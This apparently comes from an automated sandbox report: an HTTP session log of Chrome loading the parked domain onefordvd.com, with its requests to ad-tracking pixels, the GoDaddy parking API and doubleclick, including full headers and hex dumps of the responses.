                                                                          8192.168.2.553755172.67.69.194434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:19 UTC608OUTGET /px.gif?ch=1&e=0.7550573385120041 HTTP/1.1
                                                                          Host: ad-delivery.net
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:19 UTC1218INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:19 GMT
                                                                          Content-Type: image/gif
                                                                          Content-Length: 43
                                                                          Connection: close
                                                                          X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
                                                                          x-goog-generation: 1620242732037093
                                                                          x-goog-metageneration: 5
                                                                          x-goog-stored-content-encoding: identity
                                                                          x-goog-stored-content-length: 43
                                                                          x-goog-hash: crc32c=cpEfJQ==
                                                                          x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                                          x-goog-storage-class: MULTI_REGIONAL
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                                          Expires: Fri, 30 Aug 2024 15:12:19 GMT
                                                                          Cache-Control: public, max-age=86400
                                                                          Age: 776864
                                                                          Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                                          ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                          CF-Cache-Status: HIT
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LZ8JcUi4DFNk8y7Myq24F31qRBOPIcH9sz3ffBobrgTvgzjWErvfPfuhmw5LM3LUAGyPl1oqLG1bY9DNCUoqNOZYyy166R30duHfXZ03xpwi1pCuHCUyrTsjcmjS%2FaWF7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8bad7a8949174402-EWR
                                                                          2024-08-29 15:12:19 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                          Data Ascii: GIF89a!,L;


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.553756172.67.69.194434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:19 UTC688OUTGET /px.gif?ch=2 HTTP/1.1
                                                                          Host: ad-delivery.net
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                          If-Modified-Since: Wed, 05 May 2021 19:25:32 GMT
                                                                          2024-08-29 15:12:19 UTC1161INHTTP/1.1 304 Not Modified
                                                                          Date: Thu, 29 Aug 2024 15:12:19 GMT
                                                                          Connection: close
                                                                          X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
                                                                          x-goog-generation: 1620242732037093
                                                                          x-goog-metageneration: 5
                                                                          x-goog-stored-content-encoding: identity
                                                                          x-goog-stored-content-length: 43
                                                                          x-goog-hash: crc32c=cpEfJQ==
                                                                          x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                                          x-goog-storage-class: MULTI_REGIONAL
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                                          Expires: Fri, 30 Aug 2024 15:12:19 GMT
                                                                          Cache-Control: public, max-age=86400
                                                                          Age: 778996
                                                                          Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                                          ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                          CF-Cache-Status: HIT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PBaQ8WA6QLXG9nfTNGanFnmfT3HGL2kiQHUOUoDlrVu9T8cKDeZLkb10KWpo5oZm7fJ%2BH2Brg0oPvkpiNjKtZluYcOSUYWP3NsWZs5kMbMebW65gXjY4N6fhASffFrDyow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8bad7a894aa041e6-EWR


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.55375854.174.215.774434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:19 UTC587OUTOPTIONS /v1/domains/domain?domain=www.onefordvd.com&portfolioId=&abp=1&gdabp=true HTTP/1.1
                                                                          Host: api.aws.parking.godaddy.com
                                                                          Connection: keep-alive
                                                                          Accept: */*
                                                                          Access-Control-Request-Method: GET
                                                                          Access-Control-Request-Headers: x-request-id
                                                                          Origin: https://www.onefordvd.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:20 UTC748INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:19 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          Set-Cookie: AWSALB=K34XpDYj6/3/+b6yawraZJySYkm7J1V50U2eGGbSeFNViBwfK8/fbrmXexN8SKhPX1rRTI+6TYoMdEStJlMD2F3NHsfuCBLXjJSnzzF8TIq/7XJNWifKUC1IMSPu; Expires=Thu, 05 Sep 2024 15:12:19 GMT; Path=/
                                                                          Set-Cookie: AWSALBCORS=K34XpDYj6/3/+b6yawraZJySYkm7J1V50U2eGGbSeFNViBwfK8/fbrmXexN8SKhPX1rRTI+6TYoMdEStJlMD2F3NHsfuCBLXjJSnzzF8TIq/7XJNWifKUC1IMSPu; Expires=Thu, 05 Sep 2024 15:12:19 GMT; Path=/; SameSite=None; Secure
                                                                          access-control-allow-credentials: true
                                                                          access-control-allow-headers: X-Request-Id
                                                                          access-control-allow-methods: GET, HEAD, OPTIONS
                                                                          access-control-allow-origin: https://www.onefordvd.com
                                                                          access-control-max-age: 600
                                                                          x-request-id: yzjmqzA-


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.55375954.174.215.774434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:20 UTC683OUTGET /v1/domains/domain?domain=www.onefordvd.com&portfolioId=&abp=1&gdabp=true HTTP/1.1
                                                                          Host: api.aws.parking.godaddy.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          X-Request-Id: 29c03105-bfe3-4210-967e-5295b3a100a0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://www.onefordvd.com
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:20 UTC884INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:20 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 987
                                                                          Connection: close
                                                                          Set-Cookie: AWSALB=qNcHV6v+0AkVlpZCqrqfePEbwgAMWYft4zF3hak3Jf3/AWFFjVd8TQKdq2V2LWgI+a76dOeioMcinVc60/OIlvf37OksIRWebQzVT6WVuoMWXglfDIGCGqQyqCri; Expires=Thu, 05 Sep 2024 15:12:20 GMT; Path=/
                                                                          Set-Cookie: AWSALBCORS=qNcHV6v+0AkVlpZCqrqfePEbwgAMWYft4zF3hak3Jf3/AWFFjVd8TQKdq2V2LWgI+a76dOeioMcinVc60/OIlvf37OksIRWebQzVT6WVuoMWXglfDIGCGqQyqCri; Expires=Thu, 05 Sep 2024 15:12:20 GMT; Path=/; SameSite=None; Secure
                                                                          access-control-allow-credentials: true
                                                                          access-control-allow-origin: https://www.onefordvd.com
                                                                          access-control-max-age: 600
                                                                          cache-control: Private,max-age=86400
                                                                          set-cookie: cpvisitor=54cec57b-23c2-4985-a1b2-a1bcd359fb0e; Path=/; Expires=Sat, 28 Sep 2024 15:12:20 GMT; Secure; SameSite=None
                                                                          x-request-id: 29c03105-bfe3-4210-967e-5295b3a100a0
                                                                          2024-08-29 15:12:20 UTC987INData Raw: 7b 22 73 79 73 74 65 6d 22 3a 22 53 4e 22 2c 22 61 63 63 6f 75 6e 74 22 3a 22 31 31 64 31 64 65 66 35 33 34 65 61 31 62 65 30 58 34 33 31 36 32 39 33 66 58 31 35 62 63 62 63 65 35 31 30 62 58 58 32 66 38 65 20 22 2c 22 63 75 73 74 6f 6d 65 72 49 64 22 3a 22 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 22 2c 22 64 69 73 70 6c 61 79 54 79 70 65 22 3a 22 41 44 53 22 2c 22 64 61 74 61 53 6f 75 72 63 65 22 3a 22 49 4e 56 45 4e 54 4f 52 59 22 2c 22 61 64 53 65 6e 73 65 22 3a 7b 22 64 72 69 64 22 3a 22 61 73 2d 64 72 69 64 2d 32 34 31 32 37 30 38 38 37 34 33 33 33 35 34 38 22 2c 22 63 68 61 6e 6e 65 6c 22 3a 22 30 36 39 30 32 22 2c 22 70 75 62 49 64 22 3a 22 64 70 2d 6e 61 6d 65 6d 65 64 69 61 30 36
                                                                          Data Ascii: {"system":"SN","account":"11d1def534ea1be0X4316293fX15bcbce510bXX2f8e ","customerId":"00000000-0000-0000-0000-000000000000","displayType":"ADS","dataSource":"INVENTORY","adSense":{"drid":"as-drid-2412708874333548","channel":"06902","pubId":"dp-namemedia06


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.553763104.26.2.704434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:20 UTC371OUTGET /px.gif?ch=1&e=0.7379176731179411 HTTP/1.1
                                                                          Host: ad-delivery.net
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:21 UTC1226INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:20 GMT
                                                                          Content-Type: image/gif
                                                                          Content-Length: 43
                                                                          Connection: close
                                                                          X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
                                                                          x-goog-generation: 1620242732037093
                                                                          x-goog-metageneration: 5
                                                                          x-goog-stored-content-encoding: identity
                                                                          x-goog-stored-content-length: 43
                                                                          x-goog-hash: crc32c=cpEfJQ==
                                                                          x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                                          x-goog-storage-class: MULTI_REGIONAL
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                                          Expires: Fri, 30 Aug 2024 15:12:20 GMT
                                                                          Cache-Control: public, max-age=86400
                                                                          Age: 778387
                                                                          Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                                          ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                          CF-Cache-Status: HIT
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XnJQqlPgPzU0dBq4tCQhaj2RMH46d268P3IipaOYywI9zufu9KQp5MxG4d3dUKjNuFB8xJzIaQAeHYagFAFRhZg%2BmWt4P2C5RDu%2B%2FSlRRfjGaM7Z7MoHReTCdh%2F2%2Fs1uxw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8bad7a932f84c431-EWR
                                                                          2024-08-29 15:12:21 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                          Data Ascii: GIF89a!,L;


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.553762104.26.2.704434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:20 UTC350OUTGET /px.gif?ch=2 HTTP/1.1
                                                                          Host: ad-delivery.net
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:21 UTC1222INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:21 GMT
                                                                          Content-Type: image/gif
                                                                          Content-Length: 43
                                                                          Connection: close
                                                                          X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
                                                                          x-goog-generation: 1620242732037093
                                                                          x-goog-metageneration: 5
                                                                          x-goog-stored-content-encoding: identity
                                                                          x-goog-stored-content-length: 43
                                                                          x-goog-hash: crc32c=cpEfJQ==
                                                                          x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                                          x-goog-storage-class: MULTI_REGIONAL
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                                          Expires: Fri, 30 Aug 2024 15:12:21 GMT
                                                                          Cache-Control: public, max-age=86400
                                                                          Age: 777190
                                                                          Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                                          ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                          CF-Cache-Status: HIT
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mwOkJ0dQM65ctMHRDNpRMma4oCmSFKMIHAxKkDcnARIV%2FM9Oq9NN2G%2BgGQCL1V2U2rJZZuv2MZ%2BjksRasnLjuhSEQKWECcXTpqYgTZXDOfg74unzvpbh2j7dmz2jHvJjkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8bad7a9338914358-EWR
                                                                          2024-08-29 15:12:21 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                          Data Ascii: GIF89a!,L;


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.553765104.26.2.704434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:20 UTC371OUTGET /px.gif?ch=1&e=0.7550573385120041 HTTP/1.1
                                                                          Host: ad-delivery.net
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:21 UTC1218INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:21 GMT
                                                                          Content-Type: image/gif
                                                                          Content-Length: 43
                                                                          Connection: close
                                                                          X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
                                                                          x-goog-generation: 1620242732037093
                                                                          x-goog-metageneration: 5
                                                                          x-goog-stored-content-encoding: identity
                                                                          x-goog-stored-content-length: 43
                                                                          x-goog-hash: crc32c=cpEfJQ==
                                                                          x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                                          x-goog-storage-class: MULTI_REGIONAL
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                                          Expires: Fri, 30 Aug 2024 15:12:21 GMT
                                                                          Cache-Control: public, max-age=86400
                                                                          Age: 777787
                                                                          Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                                          ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                          CF-Cache-Status: HIT
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6VUU4zYT07dxb7iGfETemQx0vLYrVnEdXgqzew7BQk7DrIMWVEb9f0ORG0nAM2wmQ2ayicIc3MukGeeq80Yc8png1rUfzc3iRTRPUCNWUqMa7DEV28e%2FQWaqaKPjtJ6mMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8bad7a937c5242fe-EWR
                                                                          2024-08-29 15:12:21 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                          Data Ascii: GIF89a!,L;


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.553760184.28.90.27443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:20 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          Accept-Encoding: identity
                                                                          User-Agent: Microsoft BITS/7.8
                                                                          Host: fs.microsoft.com
                                                                          2024-08-29 15:12:21 UTC467INHTTP/1.1 200 OK
                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                          Content-Type: application/octet-stream
                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                          Server: ECAcc (lpl/EF06)
                                                                          X-CID: 11
                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                          X-Ms-Region: prod-weu-z1
                                                                          Cache-Control: public, max-age=152672
                                                                          Date: Thu, 29 Aug 2024 15:12:21 GMT
                                                                          Connection: close
                                                                          X-CID: 2


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.553764142.250.186.1664434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:21 UTC501OUTGET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1
                                                                          Host: ad.doubleclick.net
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:21 UTC746INHTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Access-Control-Allow-Origin: *
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="ads-doubleclick-media"
                                                                          Report-To: {"group":"ads-doubleclick-media","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-doubleclick-media"}]}
                                                                          Content-Length: 1078
                                                                          X-Content-Type-Options: nosniff
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Date: Wed, 28 Aug 2024 23:35:33 GMT
                                                                          Expires: Thu, 29 Aug 2024 23:35:33 GMT
                                                                          Cache-Control: public, max-age=86400
                                                                          Last-Modified: Tue, 08 May 2012 13:08:06 GMT
                                                                          Content-Type: image/x-icon
                                                                          Vary: Accept-Encoding
                                                                          Age: 56208
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-08-29 15:12:21 UTC644INData Raw: 00 00 01 00 02 00 10 10 10 00 00 00 00 00 28 01 00 00 26 00 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 4e 01 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11
                                                                          Data Ascii: (& N(
                                                                          2024-08-29 15:12:21 UTC434INData Raw: 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11
                                                                          Data Ascii:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.553770104.26.2.704434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:21 UTC451OUTGET /px.gif?ch=2 HTTP/1.1
                                                                          Host: ad-delivery.net
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                          If-Modified-Since: Wed, 05 May 2021 19:25:32 GMT
                                                                          2024-08-29 15:12:21 UTC1167INHTTP/1.1 304 Not Modified
                                                                          Date: Thu, 29 Aug 2024 15:12:21 GMT
                                                                          Connection: close
                                                                          X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
                                                                          x-goog-generation: 1620242732037093
                                                                          x-goog-metageneration: 5
                                                                          x-goog-stored-content-encoding: identity
                                                                          x-goog-stored-content-length: 43
                                                                          x-goog-hash: crc32c=cpEfJQ==
                                                                          x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                                          x-goog-storage-class: MULTI_REGIONAL
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                                          Expires: Fri, 30 Aug 2024 15:12:21 GMT
                                                                          Cache-Control: public, max-age=86400
                                                                          Age: 777793
                                                                          Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                                          ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                          CF-Cache-Status: HIT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rt1gl5n7e%2FZ7nbqrFn60SXHZYH5VIxN%2BzaaOvNk3zHc3wiMri41UBwRAhqXg3WqarY345G1EVssQTNWLICDxZU8mPkU5l8Wu%2BPBDyOh6TJeQYYoErX%2BQ7k8VWfjHH95Wgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8bad7a96f9851a1b-EWR


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.553769142.250.184.2384434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
